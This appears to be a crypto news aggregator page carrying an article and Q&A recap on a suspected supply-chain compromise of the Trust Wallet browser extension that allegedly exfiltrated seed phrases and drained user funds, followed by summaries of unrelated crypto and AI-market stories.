ZachXBT flags suspected Trust Wallet extension issue as users report drained funds

ambcryptoPublicado a 2025-12-25Actualizado a 2025-12-25

Resumen

Security concerns emerged around the Trust Wallet browser extension on December 25, after blockchain investigator ZachXBT flagged suspicious activity potentially linked to a recent update. Reports suggest a supply-chain compromise may have been introduced in a December 24 update, where newly added code could silently exfiltrate sensitive wallet data—particularly during seed phrase imports—leading to immediate fund draining. Multiple users reported losses, with unverified estimates exceeding $2 million. The malicious code allegedly sent data to a recently registered external domain mimicking Trust Wallet infrastructure. The issue appears limited to the browser extension, with no evidence of mobile app compromise. Trust Wallet has not yet issued an official response or advisory. Researchers emphasize the situation remains under investigation, warning users to avoid importing seed phrases into the extension until clarified. If confirmed, this would represent a significant supply-chain attack.

Security concerns have emerged around the Trust Wallet browser extension on 25 December, after blockchain investigator ZachXBT flagged suspicious activity potentially linked to a recent update, prompting warnings from developers and security-focused accounts.

According to posts circulating on X, the issue may stem from a suspected supply-chain compromise introduced in a 24 December browser extension update.

Newly added code within the extension could silently exfiltrate sensitive wallet data when users import a seed phrase. The claims suggest that this has led to immediate wallet draining.

Alleged Trust Wallet malicious code and data exfiltration claims

Developers examining the extension allege that a JavaScript file added in the update contains logic disguised as analytics.

The code is said to activate specifically when a seed phrase is imported. It then silently transmits wallet-related data to an external domain designed to resemble official Trust Wallet infrastructure.

The domain referenced in the reports was reportedly registered only days ago and has since gone offline.

Researchers argue that its recent creation and the timing of the extension update raise concerns about a coordinated supply-chain attack rather than user-side phishing.

Users report wallet drains following seed imports

Multiple users have reported wallets being drained shortly after importing seed phrases into the Trust Wallet browser extension.

Publicly shared estimates suggest that more than $2 million may have been lost. Although these figures have not been independently verified.

Analysts indicate that funds were routed through multiple addresses, a pattern more commonly associated with automated exploitation than isolated user error.

Scope appears limited to browser extension

At this stage, there is no indication that Trust Wallet’s mobile applications are affected.

The warnings circulating online are focused specifically on the browser extension. This is where update mechanisms and third-party dependencies present higher supply-chain risk.

Users are advised not to import seed phrases into the Trust Wallet browser extension until further clarification is provided.

No official response from Trust Wallet yet

As of the time of writing, Trust Wallet has not issued any public response, clarification, or security advisory addressing the allegations.

There has been no confirmation or denial of the claims, nor any announcement of an extension, rollback, or emergency patch.

Investigation ongoing

Researchers have emphasized that the situation remains under active investigation. Conclusions should not be drawn until the extension code and related on-chain activity have been fully reviewed.

If confirmed, the incident would represent a serious supply-chain compromise.

This is a class of attack that differs significantly from phishing or user-side mistakes. Also, it has historically resulted in rapid, large-scale losses across the crypto ecosystem.

Final Thoughts

The allegations point to a potentially serious supply-chain risk affecting wallet extensions, underscoring how code updates can become a critical attack vector if compromised.
With no response yet from Trust Wallet, users and researchers are left relying on independent investigation as scrutiny around the incident continues.

Preguntas relacionadas

QWhat security concern was flagged by ZachXBT regarding the Trust Wallet browser extension?

AZachXBT flagged suspicious activity potentially linked to a recent update of the Trust Wallet browser extension, suggesting it could be a supply-chain compromise that leads to the silent exfiltration of sensitive wallet data and immediate draining of funds.

QHow does the suspected malicious code in the Trust Wallet extension allegedly operate?

AThe malicious JavaScript code, added in an update and disguised as analytics, is said to activate when a user imports a seed phrase. It then silently transmits wallet-related data to an external domain designed to look like official Trust Wallet infrastructure.

QWhat is the estimated financial impact based on user reports, and how were the funds moved?

APublicly shared estimates suggest that more than $2 million may have been lost, though this is unverified. Analysts indicate the funds were routed through multiple addresses, a pattern associated with automated exploitation rather than isolated user error.

QAre Trust Wallet's mobile applications also affected by this suspected compromise?

ANo, there is no indication that Trust Wallet’s mobile applications are affected. The warnings are specifically focused on the browser extension, which has higher supply-chain risk due to its update mechanisms and third-party dependencies.

QWhat is the current status of Trust Wallet's official response to these allegations?

AAs of the time the article was written, Trust Wallet had not issued any public response, clarification, or security advisory addressing the allegations. There has been no confirmation, denial, or announcement of an emergency patch.

Lecturas Relacionadas

Bitcoin Mining Farm Transforms into AI Data Center: Sangha's 'Sell-Out' Decision

"Sangha, a cryptocurrency mining company, is considering selling its recently operational Genesis bitcoin mining facility in Texas. Despite being profitable due to low-cost power (approximately $32/MWh), the company is exploring a sale, joint venture, or strategic partnership, advised by Marathon Capital. The core value of the 19.9MW site lies not in the mining hardware but in its established, scalable power infrastructure—a direct connection to a 180MW solar farm with plans to expand to 110.4MW. This makes it an attractive, ready-to-use asset for AI or high-performance computing (HPC) companies seeking to avoid lengthy permitting and grid connection processes. Sangha's move reflects a broader industry trend where mining operators are pivoting towards higher-value AI compute opportunities. The decision represents a strategic shift from building a long-term 'win-win-win' mining model to capitalizing on the current premium demand for AI-ready power and data center infrastructure."

marsbitHace 6 min(s)

Bitcoin Mining Farm Transforms into AI Data Center: Sangha's 'Sell-Out' Decision

marsbitHace 6 min(s)

Dalio's Latest Warning: Don't Get Carried Away by AI, Real Returns on US Stocks in the Next 5-10 Years Could Be -5% to -10%

Ray Dalio, founder of Bridgewater Associates, warns investors against excessive concentration in AI stocks. He argues the current market, dominated by a few AI giants, mirrors historical patterns where revolutionary new technologies lead to high risk, volatility, and uncertainty. While acknowledging AI's transformative potential, Dalio emphasizes that most investors fail at this stage of the cycle by over-concentrating in a handful of leading companies. He cites inherent risks: companies cannot accurately forecast investment needs or external shocks (e.g., monetary policy, geopolitics, taxes), face potential disruption from future technologies and international competition (notably from China), and experience significant price swings. Dalio's core advice is diversification, calling it his "Holy Grail of Investing." He presents a mathematical case that a well-diversified portfolio of 15-20 uncorrelated, good bets offers a superior risk-adjusted return compared to a concentrated position. Dalio also offers a cautious outlook, suggesting U.S. stocks may deliver real returns of -5% to -10% over the next 5-10 years based on valuation and bubble indicators. He concludes that in the face of high uncertainty, the prudent strategy is not to avoid betting entirely, but to avoid large, concentrated bets where one lacks sufficient informational edge. Instead, investors should build a strategically balanced, diversified portfolio.

marsbitHace 48 min(s)

Dalio's Latest Warning: Don't Get Carried Away by AI, Real Returns on US Stocks in the Next 5-10 Years Could Be -5% to -10%

marsbitHace 48 min(s)

Rain Valuation Approaches $20 Billion: The Battle for U-Cards Extends to Rewards Systems

Rain, a stablecoin payments infrastructure company, is shifting the competitive focus for U Cards from simple issuance to user retention and repeated usage. On June 15, Rain launched "Rain Rewards," an embedded loyalty program capability within its card-issuing infrastructure. This allows partner businesses—like fintech platforms and neobanks—to configure branded loyalty points, earning rules, redemptions, and merchant promotions directly within their card products. The system, built from the 2025 acquisition of Uptop, ensures points are only issued upon final transaction settlement, preventing liabilities from refunds. Trials, such as with Avalanche Card, reportedly boosted spending by 25% among enrolled users. Founded by Farooq Malik and Charles Yoo-Naut, Rain evolved from a tool for managing Web3 company expenses into a full-stack enterprise platform. It is a Principal Member of Visa and Mastercard, enabling partners to issue stablecoin-backed cards and wallets while leveraging traditional payment networks. Notably, the popular U Card Plasma One is issued by Rain under Visa's authority. Rain also integrates with Visa's stablecoin settlement pilot, using USDC for network settlement. Rain's rapid funding reflects growing institutional interest in stablecoin payment infrastructure. It raised a $245 million Series A in March 2025, a $58 million Series B in August 2025, and a $250 million Series C in January of this year, reaching a $19.5 billion valuation. Annualized transaction volume exceeds $3 billion, serving over 200 partners including Western Union and Nuvei. Beyond cards, Rain is expanding into programmable payments. Its June 2026 "Agent Control Layer" allows businesses to set spending rules—like merchant categories, amounts, and frequency—for AI agents before transactions occur. This positions Rain not as a single product but as an operating system for stablecoin payments, handling everything from card issuance and wallet management to rewards, on/off-ramps, and automated compliance. The goal is to enable seamless, often invisible, real-world spending of on-chain assets.

Foresight NewsHace 51 min(s)

Rain Valuation Approaches $20 Billion: The Battle for U-Cards Extends to Rewards Systems

Foresight NewsHace 51 min(s)

Historical Bottom Signal Reappears? Messari Valued at $300 Million Sells for $10 Million

Messari, a major crypto data and research platform once valued at $300 million, was sold to rival Blockworks for just over $10 million in June 2026. This sale marks a broader, quiet contraction in the crypto industry. Data platforms like DappRadar and Parsec have shut down, media outlets like CoinDesk have been sold at steep discounts, and companies across the sector are laying off staff or pivoting to AI, which is disrupting traditional research and data business models. Venture capital investment in crypto has plummeted, with funding in Q1 2026 at its lowest since 2020, as capital and talent shift aggressively toward AI. Prominent crypto investors are leaving the space, and many funds are struggling. However, these extreme pessimism signals may historically indicate a market bottom. Bitcoin is down nearly 50% from its 2026 high, the Crypto Fear & Greed Index has been in "extreme fear" for months, and long-term Bitcoin holders control a near-record 80% of the supply. Similar combinations of deeply negative signals—including low VC activity and distressed asset sales—preceded major bull markets in 2018, 2020, and 2022. While Messari's downfall symbolizes a tough period, it also aligns with patterns seen at cycle lows.

marsbitHace 1 hora(s)

Historical Bottom Signal Reappears? Messari Valued at $300 Million Sells for $10 Million

marsbitHace 1 hora(s)

Google TPU Shipments Revised Up by 50%

Recent industry research indicates a significant upward revision in the shipments of Google's TPU (Tensor Processing Unit) chips. Previous expectations for 2027 were set at around 10 million units, but new estimates now point to 15 million units, a 50% increase. This substantial boost directly translates to higher demand across the entire supporting supply chain. Google's TPU clusters utilize a standardized all-optical interconnect architecture. Consequently, key hardware components are deeply integrated and scaled in fixed ratios with the chips. The 15 million TPU target will drive corresponding demand increases for NPO optical engines (roughly a 1:1 match), 1.6T optical modules, OCS optical switches, high-end server power supplies, fiber optics & MPO connectors, and liquid cooling solutions. Among these, liquid cooling is highlighted as the sector experiencing the most significant transformation and offering the most stable potential for excess returns. As next-generation TPU chips reach power levels where traditional air cooling is insufficient, liquid cooling becomes essential. 2026 is forecasted as the first year of substantial adoption for Google's liquid cooling solutions. This shift, coupled with delivery and capacity bottlenecks faced by incumbent overseas manufacturers, is creating a prime window for domestic Chinese suppliers to enter and secure Google's core supply chain. The market size for Google-specific liquid cooling is projected to potentially triple from a baseline of hundreds of billions to around 300 billion units by 2028. The logic for the fiber optic sector is also being rewritten. Once considered a cyclical commodity tied to telecom operator procurement, fiber is now a strategic and scarce resource for AI Data Centers (AIDC). A severe supply-demand imbalance, driven by the long lead time for preform production (18-24 months) and surging demand from cloud giants, is supporting strong performance. Chinese fiber manufacturers are well-positioned to capture a significant share of global AIDC demand, with exports potentially reaching 200-300 million core kilometers in 2026. Overall, the investment focus within the AI computing industry is shifting from pure "chip performance speculation" towards the more certain incremental growth in computing infrastructure and its supporting ecosystem. The upward revision in Google TPU shipments, along with the potential for further doubling by 2028, is seen as solidifying performance visibility for the entire supporting supply chain over the next two years.

marsbitHace 2 hora(s)

marsbitHace 2 hora(s)

Trading

Spot

Futuros